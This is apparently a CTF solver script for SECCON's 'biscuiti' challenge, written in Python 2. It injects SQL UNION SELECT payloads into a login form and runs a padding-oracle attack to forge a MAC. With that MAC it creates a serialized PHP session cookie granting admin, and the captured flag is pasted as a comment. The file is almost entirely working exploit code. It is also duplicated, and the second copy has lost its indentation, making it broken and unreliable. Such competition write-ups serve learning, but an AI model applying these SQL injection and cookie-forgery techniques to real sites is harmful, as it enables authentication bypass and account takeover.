sonickun/solver.py

## solver.py
from Crypto.Util.number import *
from Crypto.Cipher import AES
import requests
import time
import base64


def xor(a, b):
    return "".join([chr(ord(a[i]) ^ ord(b[i % len(b)])) for i in xrange(len(a))])

def add_pad(s):
    block_len = 16
    pad_len = block_len - len(s)
    return s + chr(pad_len)*pad_len

def padding_oracle_attack(cipher, plain):
    after_dec = ""
    for k in range(1, 17):
        for i in range(0, 256):
            pad = xor(after_dec, chr(k)*(k-1))
            iv = "A"*16
            c = "A"*(16-k) + chr(i) + pad + cipher
            assert len(iv + c) == 48
            uname = "' UNION SELECT 'a', '%s" % (base64.b64encode(iv + c))
            url = "http://biscuiti.pwn.seccon.jp/"
            payload = payload = {"username":uname, "password":""}
            r = requests.post(url, data=payload)

            if r.text.find("Hello") < 0:
                after_dec = chr(i ^ k) + after_dec
                print after_dec.encode("hex")
                break

    assert len(after_dec) == 16
    prev_cihper = xor(after_dec, plain)
    return prev_cihper


uname = "' UNION SELECT 'aaaaaaaaaaaaaaaaaaaaaaaaaa', 'hoge"
url = "http://biscuiti.pwn.seccon.jp/"
payload = payload = {"username":uname, "password":""}
r = requests.post(url, data=payload)

jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=")

u = base64.b64decode(jsession)
j = u[:-16]
mac_j = u[-16:]

P = [j[i: i+16] for i in range(0, len(j), 16)]
C = [""]*5

P[4] = add_pad(P[4])
C[4] = mac_j

for i in reversed(range(1,5)):
    C[i-1] = padding_oracle_attack(C[i], P[i])


# C = ["88bb7c4931651cb975e48e9008c1a911".decode("hex"),
#     "6106b1d3251bea689f161c65d85705eb".decode("hex"),
#     "fc04f5ccfdcfed064cf3200eace65257".decode("hex"),
#     "d48fa8585b30d06b5b5515659b5f03d8".decode("hex"),
#     "a853d2fb8dc8d23b5bca133bb84039d7".decode("hex")]

P[4] = add_pad("b:1;}")
P[2] = xor(xor(P[4], C[3]), C[1])


uname = "' UNION SELECT 'aaaaaaaaaa%s', 'hoge" % P[2]
url = "http://biscuiti.pwn.seccon.jp/"
payload = payload = {"username":uname, "password":""}
r = requests.post(url, data=payload)

jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=")

u = base64.b64decode(jsession)
j = u[:-16]
mac_j = u[-16:]

P = [j[i: i+16] for i in range(0, len(j), 16)]
C = [""]*5

P[4] = add_pad(P[4])
C[4] = mac_j

for i in reversed(range(3,5)):
    C[i-1] = padding_oracle_attack(C[i], P[i])

# C[2] = "3d469b651494c9a3289e00191a6bafb6".decode("hex")

jsession = base64.b64encode('a:2:{s:4:"name";s:26:"aaaaaaaaaaaaaaaaaaaaaaaaaa";s:7:"isadmin";b:1;}'+C[2])
url = "http://biscuiti.pwn.seccon.jp/"
header = {"Cookie":"JSESSION=%s" % jsession.replace("=","%3D")}
r = requests.post(url, headers=header)
print r.text


# <!doctype html>
# <html>
# <head><title>Login</title></head>
# <body>
# Hello aaaaaaaaaaaaaaaaaaaaaaaaaa
# SECCON{049a65dae9b075ebb68dd78d7c8c300f3b532065}
# <div><a href="logout.php">Log out</a></div>
# </body>
# </html>
	from Crypto.Util.number import *
	from Crypto.Cipher import AES
	import requests
	import time
	import base64


	def xor(a, b):
	return "".join([chr(ord(a[i]) ^ ord(b[i % len(b)])) for i in xrange(len(a))])

	def add_pad(s):
	block_len = 16
	pad_len = block_len - len(s)
	return s + chr(pad_len)*pad_len

	def padding_oracle_attack(cipher, plain):
	after_dec = ""
	for k in range(1, 17):
	for i in range(0, 256):
	pad = xor(after_dec, chr(k)*(k-1))
	iv = "A"*16
	c = "A"*(16-k) + chr(i) + pad + cipher
	assert len(iv + c) == 48
	uname = "' UNION SELECT 'a', '%s" % (base64.b64encode(iv + c))
	url = "http://biscuiti.pwn.seccon.jp/"
	payload = payload = {"username":uname, "password":""}
	r = requests.post(url, data=payload)

	if r.text.find("Hello") < 0:
	after_dec = chr(i ^ k) + after_dec
	print after_dec.encode("hex")
	break

	assert len(after_dec) == 16
	prev_cihper = xor(after_dec, plain)
	return prev_cihper


	uname = "' UNION SELECT 'aaaaaaaaaaaaaaaaaaaaaaaaaa', 'hoge"
	url = "http://biscuiti.pwn.seccon.jp/"
	payload = payload = {"username":uname, "password":""}
	r = requests.post(url, data=payload)

	jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=")

	u = base64.b64decode(jsession)
	j = u[:-16]
	mac_j = u[-16:]

	P = [j[i: i+16] for i in range(0, len(j), 16)]
	C = [""]*5

	P[4] = add_pad(P[4])
	C[4] = mac_j

	for i in reversed(range(1,5)):
	C[i-1] = padding_oracle_attack(C[i], P[i])


	# C = ["88bb7c4931651cb975e48e9008c1a911".decode("hex"),
	# "6106b1d3251bea689f161c65d85705eb".decode("hex"),
	# "fc04f5ccfdcfed064cf3200eace65257".decode("hex"),
	# "d48fa8585b30d06b5b5515659b5f03d8".decode("hex"),
	# "a853d2fb8dc8d23b5bca133bb84039d7".decode("hex")]

	P[4] = add_pad("b:1;}")
	P[2] = xor(xor(P[4], C[3]), C[1])


	uname = "' UNION SELECT 'aaaaaaaaaa%s', 'hoge" % P[2]
	url = "http://biscuiti.pwn.seccon.jp/"
	payload = payload = {"username":uname, "password":""}
	r = requests.post(url, data=payload)

	jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=")

	u = base64.b64decode(jsession)
	j = u[:-16]
	mac_j = u[-16:]

	P = [j[i: i+16] for i in range(0, len(j), 16)]
	C = [""]*5

	P[4] = add_pad(P[4])
	C[4] = mac_j

	for i in reversed(range(3,5)):
	C[i-1] = padding_oracle_attack(C[i], P[i])

	# C[2] = "3d469b651494c9a3289e00191a6bafb6".decode("hex")

	jsession = base64.b64encode('a:2:{s:4:"name";s:26:"aaaaaaaaaaaaaaaaaaaaaaaaaa";s:7:"isadmin";b:1;}'+C[2])
	url = "http://biscuiti.pwn.seccon.jp/"
	header = {"Cookie":"JSESSION=%s" % jsession.replace("=","%3D")}
	r = requests.post(url, headers=header)
	print r.text


	# <!doctype html>
	# <html>
	# <head><title>Login</title></head>
	# <body>
	# Hello aaaaaaaaaaaaaaaaaaaaaaaaaa
	# SECCON{049a65dae9b075ebb68dd78d7c8c300f3b532065}
	# <div><a href="logout.php">Log out</a></div>
	# </body>
	# </html>